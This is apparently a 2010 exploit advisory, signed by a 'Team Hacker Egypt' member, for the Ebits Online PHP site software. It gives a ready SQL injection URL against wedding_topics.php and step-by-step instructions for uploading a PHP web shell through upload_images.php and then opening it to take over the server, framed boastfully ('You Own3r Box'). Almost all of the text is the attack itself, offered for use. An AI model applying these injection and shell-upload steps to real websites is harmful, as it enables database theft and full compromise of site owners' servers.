=================================== Ebits Online <= SQL & upload shell =================================== ################################################### # Exploit Title:Ebits Online <= SQL & upload shell# # Date: 23/6/2010 # # Author: MeGo # # Vendor: Link: http://www.ebitsonline.com # # Version: 1 # # Eamil: M1GO@live.com # # Platform / Tested on: Windows xp TYPE: php # # Category: webapps/0day # # MY Team: Team Hacker Egypt # ****************************************************************** ################# #SQL [ Exploit ]# ################# http://localhost/path/wedding_topics.php?topic= [ SQL ] http://localhost/path/wedding_topics.php?topic=18+order+by+6-- ****************************************************************** ########################## #Upload Shell [ Exploit ]# ########################## Step [ 1 ] http://localhost/path/upload_images.php upload ur shell MeGo.php use [ Tember ] step [ 2 ] http://localhost/path/photos/MeGo.php dir of ur Evil :D step [ 3 ] You Own3r Box =)) ******************************************************************* Greetz To : Dr.Silnt HilL , Alsaeek , and all Member of MY Team :d SG: elga7ed , , exploit-db.com , inj3ct0r.com => only db Exploit :D ******************************************************************* _________________________________________________________________ Hotmail: Powerful Free email with security by Microsoft. https://signup.live.com/signup.aspx?id=60969